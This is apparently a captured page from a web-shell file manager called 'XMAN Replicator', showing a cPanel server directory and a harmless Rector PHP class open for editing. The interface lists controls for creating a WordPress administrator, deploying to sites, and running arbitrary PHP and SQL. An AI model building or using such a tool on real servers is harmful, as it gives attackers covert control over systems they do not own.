🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
cpanel
/
ea-wappspector
/
vendor
/
rector
/
rector
/
rules
/
CodeQuality
/
ValueObject
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2024-11-08 13:59
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2024-11-08 13:59
🔄
🗑️
🗑️📁
⬇️
🔒
KeyAndExpr.php
935 B
-rw-r--r--
2024-11-08 13:59
✏️
🔄
🗑️
⬇️
🔒
Edit: KeyAndExpr.php
<?php declare (strict_types=1); namespace Rector\CodeQuality\ValueObject; use PhpParser\Comment; use PhpParser\Node\Expr; final class KeyAndExpr { /** * @readonly * @var \PhpParser\Node\Expr|null */ private $keyExpr; /** * @readonly * @var \PhpParser\Node\Expr */ private $expr; /** * @var Comment[] * @readonly */ private $comments; /** * @param Comment[] $comments */ public function __construct(?Expr $keyExpr, Expr $expr, array $comments) { $this->keyExpr = $keyExpr; $this->expr = $expr; $this->comments = $comments; } public function getKeyExpr() : ?Expr { return $this->keyExpr; } public function getExpr() : Expr { return $this->expr; } /** * @return Comment[] */ public function getComments() : array { return $this->comments; } }
Save
PHP Console
Execute
SQL Console
Execute